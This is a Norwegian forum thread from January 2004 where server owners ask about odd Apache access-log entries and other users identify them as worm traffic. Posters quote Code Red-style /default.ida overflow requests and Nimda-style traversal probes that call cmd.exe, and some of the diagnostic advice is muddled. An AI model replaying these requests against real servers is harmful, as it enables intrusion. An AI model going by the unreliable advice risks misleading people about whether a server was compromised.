Racerro Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 Hei, lurte på om det er noen her på desse eminente foruma som kan forklare dette som den siste tida har begynt å dokke opp i min apache 1.3.29 sin access log lurer veldig på kva det er ... - - [12/Jan/2004:00:54:52 +0100] "\x16\xf4\xf6\xdd?\xab\xe5\xa6\xdc)j)g\x95" 200 0 "-" "-" - - [12/Jan/2004:01:14:45 +0100] "D\xd4\xfdM}\xba:SC\xb5$\x07\xf3\xc3" 200 0 "-" "-" - - [12/Jan/2004:01:38:58 +0100] "\x96S\xc3T\x11yF\xec+\x98\xa4\x93BY" 200 0 "-" "-" - - [12/Jan/2004:01:39:24 +0100] "\x84\xe07\xe3\xff\xa6)\xc4" 200 0 "-" "-" - - [12/Jan/2004:01:44:07 +0100] "\xad]\xae\x1cj\xc6\x8a\x8e4\x9c\x1b\xf5\x7f\x8c" 200 0 "-" "-" - - [12/Jan/2004:01:46:42 +0100] "\x16\xbb\xa0E\x8ee\x99\xa9A\"\xd2\xee" 400 - "-" "-" - - [12/Jan/2004:01:46:44 +0100] "\t\xaa\xac\xfbv\xc0\xe2\"\xa6\xfa{\x06\xdd\xd2" 400 - "-" "-" - - [12/Jan/2004:01:46:44 +0100] "[\xa8\x1a\xb2\x01\x97\x8b\x89(\x04\x17\xfa^\xfd" 200 0 "-" "-" - - [12/Jan/2004:02:49:57 +0100] "\xc7\x0e\xec%+ \xd9\xf6\x9f\xe1\xd7\x99\xc7\xe6" 400 - "-" "-" - - [12/Jan/2004:03:47:37 +0100] "\t\xeb39\xf3\xea\xf6\xcbC\x9bk9\xdd\x8e" 400 - "-" "-" - - [12/Jan/2004:08:38:50 +0100] "OPTIONS / HTTP/1.1" 200 5 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" Lenke til kommentar
Guffen Duck Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 Det ser ut som et http orm (virus) ta å søk litt på de kjente virus leverandørene etter stringene. Symantec, Trend Micro er vell de som har best info om denne typen virus. Lenke til kommentar
Micromus Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 Er nok forsøk på å utnytte et sikkerhetshull. Lenke til kommentar
tyldum Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 Kan bare bekrefte det Guffen sier, er enten ymse ormer eller noen som ser etter en sårbar IIS. Lenke til kommentar
Torbjørn Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 sjekk statuskoden returnert, hvis det står 200 på noen av linjene, er faren stor for at du er komprimert. Lenke til kommentar
jevel Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 sjekk statuskoden returnert, hvis det står 200 på noen av linjene, er faren stor for at du er komprimert. Har usedvanlig lite peiling på Apache, men regner med at Torbjørn her mener kompromittert, dvs. at noen har kommet seg inn hos deg, og ikke komprimert som i zippet elns. Bare til info. -KJ Lenke til kommentar
Racerro Skrevet 12. januar 2004 Forfatter Del Skrevet 12. januar 2004 Kjenner til kva komprimert betyr ja.. he he Men er der noen som kan fortelle meg litt mere om kva dette betyr, for som en kan sjå i fleire av dei linjene som eg pasta så er faktisk return koda 200 .. Som da ettersom eg forstår betyr "response ok" lr no slikt. Noen med linker på nettet til dette problemet ? Lenke til kommentar
Torbjørn Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 (endret) det betyr at du bør avinstallere IIS farlig svint, vurdere å reinstallere hele maskinen, patche det du finner av patcher. og bruke Apache hvis du trenger en webserver. EDIT: jeg roter alltid med kompromitert og komprimert EDIT2: jeg så ikke at statuskodene sto på linjene ved første posting, men ja, en eller annen worm har kommet seg inn, gudene må vite hva de har gjort på maskinen din. Endret 12. januar 2004 av Torbjørn Lenke til kommentar
Lurifaksen Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 det betyr at du bør avinstallere IIS farlig svint, vurdere å reinstallere hele maskinen, patche det du finner av patcher. og bruke Apache hvis du trenger en webserver. Med tanke på at det er i apache loggen han leser, så er vel ikke å fjerne IIS og installere apache et godt forslag... Lenke til kommentar
Torbjørn Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 (endret) Til sammenligning, her er noen linjer fra weblogen min: 80.200.31.115 - - [11/Jan/2004:13:05:43 +0100] "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000% u00=a HTTP/1.0" 404 1059 80.200.27.213 - - [11/Jan/2004:15:54:04 +0100] "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000% u00=a HTTP/1.0" 404 1059 212.111.38.149 - - [12/Jan/2004:09:24:21 +0100] "GET /scripts/..%255c%255c.. /winnt/system32/cmd.exe?/c+dir" 404 1059 jeg kjører nettopp apache, som er en mye sikrere webserver, så det får ikke noe å si for min server. de angrepene du ser her, er ingen bevisste angrep fra maskinene loggført. det er andre maskiner (som din) som selv har blitt tatt over og prøver å spre seg videre. Endret 12. januar 2004 av Torbjørn Lenke til kommentar
Torbjørn Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 det betyr at du bør avinstallere IIS farlig svint, vurdere å reinstallere hele maskinen, patche det du finner av patcher. og bruke Apache hvis du trenger en webserver. Med tanke på at det er i apache loggen han leser, så er vel ikke å fjerne IIS og installere apache et godt forslag... oops jeg eter i meg små-krasse formuleringer. vurder å installere en nyere apacheversjon. Lenke til kommentar
Racerro Skrevet 12. januar 2004 Forfatter Del Skrevet 12. januar 2004 EDIT2: jeg så ikke at statuskodene sto på linjene ved første posting, men ja, en eller annen worm har kommet seg inn, gudene må vite hva de har gjort på maskinen din. Så det du sier er att eg har en worm på min maskin, som ingen anitvirus programmer er istand til å hanskes med ? Kjører Norton Antivirus 2004 Pro så var det sagt. Lenke til kommentar
Torbjørn Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 det er ikke usannsynlig, noen fikk hvertfall kjørt sin egen kode på din server. jeg vet ikke hvordan moderne virusprogrammer håndterer ormene det her er snakk om. Lenke til kommentar
Racerro Skrevet 12. januar 2004 Forfatter Del Skrevet 12. januar 2004 Bare ett valg da, stenge ned skiten å vente på bedre vêr. Takk for all hjelp Lenke til kommentar
Lurifaksen Skrevet 12. januar 2004 Del Skrevet 12. januar 2004 (endret) Tok en titt i apache loggen min og fant dette, to ganger, fra to forskjellige IP'er: 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 82.35.38.xx - - [27/Dec/2003:19:40:35 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 82.35.38.xx - - [27/Dec/2003:19:40:35 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 Hva i alle dager er dette? Dette er en privat webserver, som stort sett kun brukes av meg. Er egentlig ingen jeg ikke kjenner som vet om den. Legg merke til at min windows mappe er \windows\ og ikke \winnt\ Dette tyder kanskje på at en fyr har prøvd å bryte seg inn, med tanke på at vedkommede forsøker både C og D. Han er ikke spesielt glup akkurat med tanke på at han kun har prøvd "winnt" mappenavnet, og ikke "windows" er et vanlig alternativ til winnt, og standard i 2003). Men dette har altså skjedd to ganger, men fra to (helt forskjellige IP'er). To forskjellige folk kan vel ikke tilfeldigvis ha prøvd akkurat det samme, i samme rekkefølge? Endret 12. januar 2004 av GeeZuZz Lenke til kommentar
Torbjørn Skrevet 13. januar 2004 Del Skrevet 13. januar 2004 Slike ting er bare for tilfeldig bakgrunnsstøy å regne. Det kommer fra infiserte maskiner som står og spyr ut slike webhit på mer eller mindre tilfeldige IP'er for å finne nye "ofre", (upatchede maskiner) Hvis din maskin blir infisert, vil den sannsynligvis også begynne med denne oppførselen mot andre tilfeldige webservere. Lenke til kommentar
Linuxguru Skrevet 13. januar 2004 Del Skrevet 13. januar 2004 Er det ikke flott at noen tar seg tid til å komprimerer deg nå etter julefråtsingen da? Lenke til kommentar
hackinnen^ Skrevet 13. januar 2004 Del Skrevet 13. januar 2004 Jeg har en boks stående hjemme og der har jeg flere millioner linjer med slike logger, mulig den boksen sliter litt fordi den har farlig gammel apache-versjon, men det ser ut til å gå bra, iallfall foreløpig. Lenke til kommentar
Guffen Duck Skrevet 13. januar 2004 Del Skrevet 13. januar 2004 Er helt sikker på at du har en orm, problemet med slike ormer er at de sprer seg i minne. Du kan ha verdens beste virus program, problemet er at det funker bare når noe skrives til disk (Windows 2000, Windows XP) Dette gjelder ikke for windows ME, eller tidligere. Hvis du bruker linux som server, kan du se bort i fra den loggføringen du har der, dette er et MS orm, som sprer seg fra port til port. Edit: Det innleg Torbjørn la er Code Red eller Nimda. Eneste måten å stoppe inkommende ormer på er å ha siste sikkerhets oppdatering. Det fleste ormer bygger på kjente sikkerhets hull enten i Windows eller i Apache. En god ide med apache er å skru av alle de modulene du ikke trenger, dette øker sikkerheten betraklig. Lenke til kommentar
SvUpP Skrevet 13. januar 2004 Del Skrevet 13. januar 2004 Tok en titt i apache loggen min og fant dette, to ganger, fra to forskjellige IP'er: 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 82.35.38.xx - - [27/Dec/2003:19:40:32 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 82.35.38.xx - - [27/Dec/2003:19:40:33 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 82.35.38.xx - - [27/Dec/2003:19:40:34 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 82.35.38.xx - - [27/Dec/2003:19:40:35 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 82.35.38.xx - - [27/Dec/2003:19:40:35 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 Hva i alle dager er dette? Dette er en privat webserver, som stort sett kun brukes av meg. Er egentlig ingen jeg ikke kjenner som vet om den. Legg merke til at min windows mappe er \windows\ og ikke \winnt\ Dette tyder kanskje på at en fyr har prøvd å bryte seg inn, med tanke på at vedkommede forsøker både C og D. Han er ikke spesielt glup akkurat med tanke på at han kun har prøvd "winnt" mappenavnet, og ikke "windows" er et vanlig alternativ til winnt, og standard i 2003). Men dette har altså skjedd to ganger, men fra to (helt forskjellige IP'er). To forskjellige folk kan vel ikke tilfeldigvis ha prøvd akkurat det samme, i samme rekkefølge? Det der er standard IIS angrep. 99% garantert en Orm. For oss Apache-brukere er det der ren bakgrunnstøy. Husker bl.a når NIMDA ormen herjet som værst, da kom det inn bøttevis med slike angrep. Det er også helt klart at det er mange (!) maskiner der ute som FORTSATT er infisert av NIMDA. Så mest trolig er det der en NIMDA-orm som driver å scanner alle maskiner som har en åpen port 80. Hadde du hatt en gammel, upatchet IIS liggende, så hadde det der angrepet kommet inn. Typisk standardinstallasjoner av NT40. Mvh. SvUpP Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå